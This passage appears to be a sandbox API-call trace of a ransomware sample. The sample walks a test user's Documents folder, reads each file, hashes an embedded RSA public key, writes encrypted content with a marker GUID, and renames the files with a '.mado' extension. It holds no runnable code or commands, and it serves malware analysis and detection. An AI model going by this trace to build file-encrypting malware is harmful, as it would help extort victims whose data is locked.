RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bdb0 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bb80 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68180 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68390 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68180 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68498 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e708 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68288 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.200] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0xcd49, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0xcd49, lpOverlapped=0x0) returned 1 [0204.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.201] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcd4e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.201] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.201] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.201] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.201] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.201] CloseHandle (hObject=0x63c) returned 1 [0204.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.202] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Wx7uR8WZdnzLGz3ii8Q.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wx7ur8wzdnzlgz3ii8q.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Wx7uR8WZdnzLGz3ii8Q.ods.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wx7ur8wzdnzlgz3ii8q.ods.mado")) returned 1 [0204.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.203] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.204] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b819640, ftCreationTime.dwHighDateTime=0x1d5dc8c, ftLastAccessTime.dwLowDateTime=0xb4a505f0, ftLastAccessTime.dwHighDateTime=0x1d5e6c4, ftLastWriteTime.dwLowDateTime=0xb4a505f0, ftLastWriteTime.dwHighDateTime=0x1d5e6c4, nFileSizeHigh=0x0, nFileSizeLow=0xd3be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x3z7_eKU3Rz2FWQ.csv", cAlternateFileName="X3Z7_E~1.CSV")) returned 1 [0204.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.204] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3z7_eKU3Rz2FWQ.csv") returned=".csv" [0204.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3z7_eKU3Rz2FWQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x3z7_eku3rz2fwq.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.205] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=54206) returned 1 [0204.206] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.208] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd398, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.208] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.210] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.210] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xd3be, lpOverlapped=0x0) returned 1 [0204.211] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.211] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.211] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.211] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.212] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.212] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.212] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.212] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.212] GetLastError () returned 0x0 [0204.212] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.212] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.212] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.212] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.212] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd3c0) returned 0x3b80690 [0204.213] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e708 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0d0 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e750 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe118 [0204.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.213] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0204.214] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd3be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.214] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.214] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.214] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.214] CloseHandle (hObject=0x63c) returned 1 [0204.215] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3z7_eKU3Rz2FWQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x3z7_eku3rz2fwq.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3z7_eKU3Rz2FWQ.csv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x3z7_eku3rz2fwq.csv.mado")) returned 1 [0204.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.218] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.219] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x445df610, ftCreationTime.dwHighDateTime=0x1d5a03f, ftLastAccessTime.dwLowDateTime=0xc4f68370, ftLastAccessTime.dwHighDateTime=0x1d58d69, ftLastWriteTime.dwLowDateTime=0xc4f68370, ftLastWriteTime.dwHighDateTime=0x1d58d69, nFileSizeHigh=0x0, nFileSizeLow=0x1e54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zj3qy-Hilt P.docx", cAlternateFileName="ZJ3QY-~1.DOC")) returned 1 [0204.219] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zj3qy-Hilt P.docx") returned=".docx" [0204.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zj3qy-Hilt P.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zj3qy-hilt p.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.219] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=7764) returned 1 [0204.219] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.222] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1e2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.222] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.223] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1e54, lpOverlapped=0x0) returned 1 [0204.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.224] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.225] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.225] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.225] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.225] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.225] GetLastError () returned 0x0 [0204.225] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.225] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | 